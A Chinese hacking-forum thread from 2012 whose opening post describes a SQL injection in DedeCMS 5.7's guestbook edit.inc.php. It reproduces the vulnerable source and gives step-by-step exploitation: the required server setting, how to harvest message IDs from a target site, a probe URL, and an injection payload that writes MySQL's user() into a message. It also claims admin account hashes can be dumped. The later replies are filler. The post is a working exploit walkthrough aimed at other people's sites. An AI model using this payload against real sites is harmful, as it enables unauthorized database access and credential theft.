查看: 3633|回复: 25

dedecms 5.7 edit.inc.php文件注射

[复制链接]
发表于 2012-12-3 05:58:28 | 显示全部楼层 |阅读模式
漏洞文件edit.inc.php具体代码:<?php

if(!defined('DEDEINC')) exit('Request Error!');

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";

$id = intval($id);
if(empty($job)) $job='view';

if($job=='del' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");
    ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='check' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
    ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='editok')
{
    $remsg = trim($remsg);
    if($remsg!='')
    {
        //管理员回复不过滤HTML

  if($g_isadmin)        {
            $msg = "<div class=\\'rebox\\'>".$msg."</div>\n".$remsg;
            //$remsg <br><font color=red>管理员回复:</font>
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "<div class=\\'rebox\\'>".addslashes($row['msg'])."</div>\n";
            $remsg = trimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
   //这里没有对$msg过滤,导致可以任意注入了
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);
    exit();
}

if($g_isadmin)
{
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}

漏洞成功需要条件:
                          1. php magic_quotes_gpc=off
                          2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞:
                                先打开www.xxx.com /plus/guestbook.php  可以看到别人的留言,
                                然后鼠标放在 [回复/编辑]   上 可以看到别人留言的ID。那么记下ID
                                访问:www.xxx.com/plus/guestbook.php?a ... ditok&msg=90sec存在的留言ID
                                提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
                               跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 90sec' 如果变成了 那么证明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
                               如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。
                               那么再次访问 www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='
                               然后返回,那条留言ID的内容就直接修改成了mysql 的user().

大概利用就是这样,大家有兴趣的多研究下!!

最后补充下,估计有人会说怎么暴管理后台帐户密码,你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)!!
&#8203;


发表于 2012-12-6 11:06:13 | 显示全部楼层
一楼的位置好啊..  
发表于 2014-10-20 01:19:16 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-10-26 19:04:28 | 显示全部楼层
昨晚多几分钟的准备,今天少几小时的麻烦。  
发表于 2014-11-6 05:38:58 | 显示全部楼层
做一个,做好了,请看  
发表于 2014-11-18 18:35:30 | 显示全部楼层
厉害!强~~~~没的说了!  
发表于 2014-12-6 12:52:19 | 显示全部楼层
哈哈,这么多的人都回了,我敢不回吗?赶快回一个,很好的,我喜欢  
发表于 2014-12-29 17:53:52 | 显示全部楼层
回帖是种美德.  
发表于 2015-1-29 14:29:52 | 显示全部楼层
呵呵 哪天得看看 `~~~~  
发表于 2015-3-3 18:36:19 | 显示全部楼层
…没我说话的余地…飘走  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则